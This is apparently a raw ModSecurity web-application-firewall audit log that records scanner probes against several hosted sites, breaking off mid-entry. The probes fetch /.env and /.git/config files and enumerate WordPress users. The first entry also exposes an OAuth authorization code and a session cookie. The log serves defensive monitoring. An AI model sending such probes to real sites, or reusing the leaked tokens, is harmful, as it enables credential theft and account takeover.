/administration/index.php?code=4/0AVMBsJgk3XNd3BgG0v5LW4jT_lMvKcYRL6WJBOnTYtkPXVgT8kqEtOaTVwU6POrTcw1ETQ&scope=email%20profile%20https://mail.google.com/%20https://www.googleapis.com/auth/calendar%20https://www.googleapis.com/auth/classroom.courses%20https://www.googleapis.com/auth/classroom.rosters%20https://www.googleapis.com/auth/admin.directory.user%20https://www.googleapis.com/auth/userinfo.email%20https://www.googleapis.com/auth/userinfo.profile%20openid&authuser=0&hd=jinan.edu.lb&prompt=consent HTTP/1.0 Host: jinansystem.com X-Real-IP: 212.28.242.188 X-Accel-Internal: /internal-nginx-static-location Connection: close sec-ch-ua: "Not)A;Brand";v="8", "Chromium";v="138", "Google Chrome";v="138" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-user: ?1 sec-fetch-dest: document referer: https://accounts.google.com/ accept-encoding: gzip, deflate, br, zstd accept-language: en-US,en;q=0.9 priority: u=0, i cookie: PHPSESSID=fsbjkcrdqs72s4n04dj1cd71k6 --c58d1502-F-- HTTP/1.1 200 OK Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Content-Encoding: gzip Content-Length: 3671 Content-Type: text/html; charset=UTF-8 --c58d1502-H-- Message: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase ".profile" at ARGS:scope. [file "/etc/apache2/modsecurity.d/rules/comodo_free/08_Global_Other.conf"] [line "57"] [id "210580"] [rev "2"] [msg "COMODO WAF: OS File Access Attempt||jinansystem.com|F|2"] [data "Matched Data: .profile found within ARGS:scope: email profile https:/mail.google.com/ https:/www.googleapis.com/auth/calendar https:/www.googleapis.com/auth/classroom.courses https:/www.googleapis.com/auth/classroom.rosters https:/www.googleapis.com/auth/admin.directory.user https:/www.googleapis.com/auth/userinfo.email https:/www.googleapis.com/auth/userinfo.profile openid"] [severity "CRITICAL"] [tag "CWAF"] [tag "Other"] [hostname "jinansystem.com"] [uri "/administration/index.php"] [unique_id "aIIaIjzwUUVu1Y0WeVSSKgAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/jinansystem.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753356834001517 425301 (- - -) Stopwatch2: 1753356834001517 425301; combined=4982, p1=681, p2=3985, p3=127, p4=54, p5=134, sr=176, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c58d1502-Z-- --83e6d572-A-- [24/Jul/2025:14:48:37.605365 +0300] aIIdlTzwUUVu1Y0WeVSqcQAAABc 41.216.188.205 42286 127.0.0.1 7081 --83e6d572-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: first-builders.com X-Real-IP: 41.216.188.205 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 11.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9,ar;q=0.8 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: none Sec-Fetch-User: ?1 Cache-Control: max-age=0 Sec-Ch-Ua: "Not_A Brand";v="8", "Chromium";v="120", "Google Chrome";v="120" Sec-Ch-Ua-Mobile: ?0 Sec-Ch-Ua-Platform: "Windows" Cookie: wordpress_test_cookie=WP%20Cookie%20check --83e6d572-F-- HTTP/1.1 503 Service Unavailable X-Powered-By: PHP/8.3.23 Retry-After: 600 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=utf-8 --83e6d572-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "first-builders.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aIIdlTzwUUVu1Y0WeVSqcQAAABc"] Apache-Handler: proxy:unix:/var/www/vhosts/system/first-builders.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753357717593756 11732 (- - -) Stopwatch2: 1753357717593756 11732; combined=3924, p1=654, p2=3158, p3=0, p4=0, p5=112, sr=202, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --83e6d572-Z-- --f2fd2653-A-- [24/Jul/2025:15:02:56.633176 +0300] aIIg7zzwUUVu1Y0WeVTELwAAAAQ 213.209.143.116 51074 127.0.0.1 7081 --f2fd2653-B-- GET /.env HTTP/1.0 Host: www.raversys.co.uk X-Real-IP: 213.209.143.116 X-Accel-Internal: /internal-nginx-static-location Connection: close user-agent: Mozilla/5.0 accept-encoding: gzip --f2fd2653-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --f2fd2653-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.raversys.co.uk"] [uri "/.env"] [unique_id "aIIg7zzwUUVu1Y0WeVTELwAAAAQ"] Apache-Handler: proxy:unix:/var/www/vhosts/system/raversys.co.uk/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753358575258540 1374747 (- - -) Stopwatch2: 1753358575258540 1374747; combined=2302, p1=512, p2=1638, p3=0, p4=0, p5=151, sr=129, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --f2fd2653-Z-- --62492322-A-- [24/Jul/2025:15:03:02.038041 +0300] aIIg9DzwUUVu1Y0WeVTETQAAAAI 18.236.104.120 51498 127.0.0.1 7081 --62492322-B-- GET /.git/config HTTP/1.0 Host: raversys.co.uk X-Real-IP: 18.236.104.120 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.15 (KHTML, like Gecko) Chrome/10.0.613.0 Safari/534.15 Accept-Charset: utf-8 Accept-Encoding: gzip --62492322-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --62492322-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "raversys.co.uk"] [uri "/.git/config"] [unique_id "aIIg9DzwUUVu1Y0WeVTETQAAAAI"] Apache-Handler: proxy:unix:/var/www/vhosts/system/raversys.co.uk/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753358580610335 1427777 (- - -) Stopwatch2: 1753358580610335 1427777; combined=2899, p1=609, p2=2165, p3=0, p4=0, p5=125, sr=173, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --62492322-Z-- --5f596c1a-A-- [24/Jul/2025:15:04:31.060277 +0300] aIIhT4TiRAaWRFFxa-VR9gAAAMs 167.86.74.247 56818 127.0.0.1 7081 --5f596c1a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Host: first-builders.com X-Real-IP: 167.86.74.247 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0 Accept-Encoding: gzip, deflate, br Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-US,en;q=0.9,de;q=0.8 Upgrade-Insecure-Requests: 1 Sec-Fetch-Dest: document Sec-Fetch-Mode: navigate Sec-Fetch-Site: same-origin Sec-Fetch-User: ?1 Pragma: no-cache Referer: Cookie: wordpress_test_cookie=WP%20Cookie%20check --5f596c1a-F-- HTTP/1.1 503 Service Unavailable X-Powered-By: PHP/8.3.23 Retry-After: 600 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=utf-8 --5f596c1a-H-- Message: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/etc/apache2/modsecurity.d/rules/comodo_free/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||first-builders.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] [hostname "first-builders.com"] [uri "/wp-json/wp/v2/users"] [unique_id "aIIhT4TiRAaWRFFxa-VR9gAAAMs"] Apache-Handler: proxy:unix:/var/www/vhosts/system/first-builders.com/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753358671039883 20550 (- - -) Stopwatch2: 1753358671039883 20550; combined=3277, p1=520, p2=2629, p3=0, p4=0, p5=127, sr=173, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5f596c1a-Z-- --60ffb068-A-- [24/Jul/2025:15:12:00.334786 +0300] aIIjDjzwUUVu1Y0WeVTTPQAAABg 18.236.104.120 55388 127.0.0.1 7081 --60ffb068-B-- GET /.git/config HTTP/1.0 Host: www.raversys.co.uk X-Real-IP: 18.236.104.120 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --60ffb068-F-- HTTP/1.1 404 Not Found X-Powered-By: PHP/8.3.23 Cache-Control: no-cache, private pragma: no-cache expires: -1 Upgrade: h2,h2c Connection: Upgrade, close Content-Type: text/html; charset=UTF-8 --60ffb068-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.raversys.co.uk"] [uri "/.git/config"] [unique_id "aIIjDjzwUUVu1Y0WeVTTPQAAABg"] Apache-Handler: proxy:unix:/var/www/vhosts/system/raversys.co.uk/php-fpm.sock|fcgi://127.0.0.1:9000 Stopwatch: 1753359118945563 1389367 (- - -) Stopwatch2: 1753359118945563 1389367; combined=6179, p1=536, p2=5509, p3=0, p4=0, p5=133, sr=135, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --60ffb068-Z-- --b33e1537-A-- [24/Jul/2025:15:14:06.629663 +0300] aIIjjjzwUUVu1Y0WeVTWmgAAABI 78.153.140.218 34460 127.0.0.1 7081 --b33e1537-B-- GET /.env HTTP/1.0 Host: own-dev.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Linux; Android 6.0.1; SAMSUNG SM-G900P Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/4.0 Chrome/44.0.2403.133 Mobile Safari/537.36 --b33e1537-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --b33e1537-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/.env"] [unique_id "aIIjjjzwUUVu1Y0WeVTWmgAAABI"] Stopwatch: 1753359246581767 48219 (- - -) Stopwatch2: 1753359246581767 48219; combined=3533, p1=535, p2=2305, p3=63, p4=69, p5=560, sr=164, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --b33e1537-Z-- --c2fdda62-A-- [24/Jul/2025:15:14:06.654953 +0300] aIIjjoTiRAaWRFFxa-VYVQAAAM8 78.153.140.218 34466 127.0.0.1 7081 --c2fdda62-B-- GET /.env HTTP/1.0 Host: www.own-dev.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (X11; U; Linux ppc; en-US; rv:1.9.0.4) Gecko/2008111317 Ubuntu/8.04 (hardy) Firefox/3.0.4 --c2fdda62-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --c2fdda62-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "www.own-dev.com"] [uri "/.env"] [unique_id "aIIjjoTiRAaWRFFxa-VYVQAAAM8"] Stopwatch: 1753359246584464 70580 (- - -) Stopwatch2: 1753359246584464 70580; combined=2777, p1=611, p2=1884, p3=65, p4=69, p5=147, sr=151, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --c2fdda62-Z-- --e5b14b2a-A-- [24/Jul/2025:15:14:06.911084 +0300] aIIjjjzwUUVu1Y0WeVTWnQAAAAE 78.153.140.218 34496 127.0.0.1 7081 --e5b14b2a-B-- GET /.env HTTP/1.0 Host: own-dev.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36 OPR/35.0.2066.68 --e5b14b2a-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --e5b14b2a-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/.env"] [unique_id "aIIjjjzwUUVu1Y0WeVTWnQAAAAE"] Stopwatch: 1753359246876800 34450 (- - -) Stopwatch2: 1753359246876800 34450; combined=3766, p1=677, p2=2821, p3=65, p4=41, p5=162, sr=182, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --e5b14b2a-Z-- --5102892f-A-- [24/Jul/2025:15:14:16.355677 +0300] aIIjmDzwUUVu1Y0WeVTW9gAAABQ 78.153.140.218 43062 127.0.0.1 7081 --5102892f-B-- GET /api/.env HTTP/1.0 Host: own-dev.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; AS; rv:11.0) like Gecko --5102892f-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --5102892f-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/api/.env"] [unique_id "aIIjmDzwUUVu1Y0WeVTW9gAAABQ"] Stopwatch: 1753359256315721 40041 (- - -) Stopwatch2: 1753359256315721 40041; combined=5171, p1=586, p2=4402, p3=57, p4=41, p5=85, sr=148, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --5102892f-Z-- --574c0156-A-- [24/Jul/2025:15:14:20.301219 +0300] aIIjnITiRAaWRFFxa-VYqQAAANE 78.153.140.218 43632 127.0.0.1 7081 --574c0156-B-- GET /dev/.env HTTP/1.0 Host: own-dev.com X-Real-IP: 78.153.140.218 X-Accel-Internal: /internal-nginx-static-location Connection: close Accept: */* User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X; de-de) AppleWebKit/85.8.5 (KHTML, like Gecko) Safari/85 --574c0156-F-- HTTP/1.1 404 Not Found link: </_next/static/media/a901a185d5dbd5ee-s.p.ttf>; rel=preload; as="font"; crossorigin=""; type="font/ttf", </own logo.png>; rel=preload; as="image" X-Powered-By: Next.js, Phusion Passenger(R) 6.0.26 Cache-Control: private, no-cache, no-store, max-age=0, must-revalidate Vary: RSC,Next-Router-State-Tree,Next-Router-Prefetch,Next-Router-Segment-Prefetch,Accept-Encoding Upgrade: h2,h2c Status: 404 Not Found Connection: close Content-Type: text/html; charset=utf-8 --574c0156-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "own-dev.com"] [uri "/dev/.env"] [unique_id "aIIjnITiRAaWRFFxa-VYqQAAANE"] Stopwatch: 1753359260269467 31848 (- - -) Stopwatch2: 1753359260269467 31848; combined=2325, p1=509, p2=1610, p3=62, p4=42, p5=101, sr=142, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --574c0156-Z-- --0b23f676-A-- [24/Jul/2025:15:23:46.505575 +0300] aIIl0jzwUUVu1Y0WeVToZAAAABY 198.55.98.216 51276 127.0.0.1 7081 --0b23f676-B-- GET /.git/config HTTP/1.0 Host: alc.edu.lb X-Forwarded-Http-Host: alc.edu.lb:443 X-Real-IP: 198.55.98.216 Connection: close User-Agent: Mozilla/5.0 (Linux; Android 9; GM1910) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --0b23f676-F-- HTTP/1.1 301 Moved Permanently Location: https://www.alcsys.odoo.com/.git/config Content-Length: 308 Connection: close Content-Type: text/html; charset=iso-8859-1 --0b23f676-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "alc.edu.lb"] [uri "/.git/config"] [unique_id "aIIl0jzwUUVu1Y0WeVToZAAAABY"] Stopwatch: 1753359826504256 1417 (- - -) Stopwatch2: 1753359826504256 1417; combined=877, p1=715, p2=0, p3=36, p4=33, p5=93, sr=271, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --0b23f676-Z-- --43820440-A-- [24/Jul/2025:15:23:49.320564 +0300] aIIl1TzwUUVu1Y0WeVTobAAAABM 213.136.84.241 51342 127.0.0.1 7081 --43820440-B-- GET /.git/config HTTP/1.0 Host: itilebanon.com X-Real-IP: 213.136.84.241 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36 Accept-Charset: utf-8 Accept-Encoding: gzip --43820440-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Thu, 24 Jul 2014 11:29:50 GMT ETag: "3bf-4feeec6556780" Accept-Ranges: bytes Content-Length: 959 Content-Type: text/html --43820440-H-- Message: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "itilebanon.com"] [uri "/.git/config"] [unique_id "aIIl1TzwUUVu1Y0WeVTobAAAABM"] Stopwatch: 1753359829315670 4977 (- - -) Stopwatch2: 1753359829315670 4977; combined=2737, p1=606, p2=2050, p3=0, p4=0, p5=80, sr=170, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.10 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache Engine-Mode: "DETECTION_ONLY" --43820440-Z-- --53c6d95d-A-- [24/Jul/2025:15:25:06.519654 +0300] aIImIjzwUUVu1Y0WeVTrIgAAAAg 212.56.54.46 50390 127.0.0.1 7081 --53c6d95d-B-- GET /.env HTTP/1.0 Host: haddadjewellery.com X-Real-IP: 212.56.54.46 X-Accel-Internal: /internal-nginx-static-location Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:77.0) Gecko/20100101 Firefox/77.0 Accept-Encoding: gzip, deflate Accept: */* --53c6d95d-F-- HTTP/1.1 404 Not Found Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 21 Jan 2025 14:39:31 GMT ETag: "328-62c38584f0049" Accept-Ranges: bytes Content-Length: 808 Content-Type: text/html --53c6d95d-H-- Message: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 286] [level 3] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_URI. [file "/etc/apache2/modsecurity.d/rules/comodo_free/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] [hostname "haddadjewellery.com"] [uri "/.env"] [unique_id 